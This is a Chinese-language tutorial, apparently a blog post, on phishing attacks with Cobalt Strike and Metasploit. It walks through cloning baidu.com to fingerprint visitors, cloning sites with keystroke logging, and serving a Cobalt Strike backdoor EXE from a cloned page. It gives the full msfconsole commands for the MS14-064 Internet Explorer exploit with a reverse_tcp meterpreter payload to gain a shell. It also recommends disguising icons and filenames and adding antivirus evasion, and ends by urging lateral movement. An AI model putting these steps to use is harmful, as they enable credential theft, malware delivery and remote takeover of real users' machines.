一、環境
自行搭建,kill,Windows10,cs
二、原理
如圖所示
三、釣魚演示
首先第一步:打開System Profiler-分析器功能
選擇克隆www.baidu.com
頁面做釣魚
之后我們通過包裝域名,各種手段讓攻擊對象訪問:http:kill的ip/baidu
之后會自動跳轉到百度
可看到選擇應用信息后,釣到了用戶用的系統以及瀏覽器版本型號…這里別小看兩個信息,思路是該模塊可以修改,利用溢出代碼等形式提權或者獲得更多的信息收集…下面我會寫一些演示!! ?
3.1 克隆模塊和克隆網站進行鍵盤記錄攻擊
打開克隆網站模塊
?克隆鍵盤記錄
這里克隆網站可以是http和https的URL…克隆到192.168.2.153:801鏈接上!! 勾選Log Keystrokes on cloned site后,記錄鍵盤操作! ?
點擊web log等待
等對方在克隆網站上進行操作后
?我們這邊直接監聽
可看到記錄了對方輸入鍵盤的信息
3.2克隆網站下載執行木馬
打開Host File 克隆一個頁面并提供一個后門文件
file:選擇CS生成的shell,或者MSF也行! 確定URL下載的地址端口鏈接等情況! ?
木馬做好放里面
生成http://192.168.131.129:801/download/file.exe惡意鏈接
制作釣魚網頁
訪問釣魚網頁
可看到ie訪問該頁面下載了file.exe生成的CS后門文件… 這里ie帶有web安全下載防御功能這種思路是兩個模塊配合完成的,其中可以修改圖標、文件名、弄個免殺、換個欺騙鏈接,很好釣魚!
點擊軟件木馬上線
3.3 Metasploit溢出代碼與Cobalt Strik配合釣魚(重點)
本次演示的是思路,拿的是一個針對XP或者以下系統,利用MS14_064利用IE執行遠控木馬…記住是思路!!
use exploit/windows/browser/ms14_064_ole_code_execution set srvhost 192.168.2.153 set SRVPORT 6666 set payload windows/meterpreter/reverse_tcp set lhost 192.168.2.153 exploit
?這里很簡答,MSF執行即可~ ?
`http://192.168.2.153:6666/Sixcra`獲得惡意鏈接
很簡單,利用和方法3一樣,打開克隆網站模塊,放入Attack即可!! 這里就不勾選鍵盤記錄了,因為直接能控制對方了!
生成URL:http://192.168.2.153:80/baidu
可看到當對方訪問做好的http://192.168.2.153:80/baidu釣魚頁面后,直接跳轉到了百度…
但是通過溢出漏洞在攻擊端獲得了對方的控制shell…
通過控制,繼續橫向滲透即可!!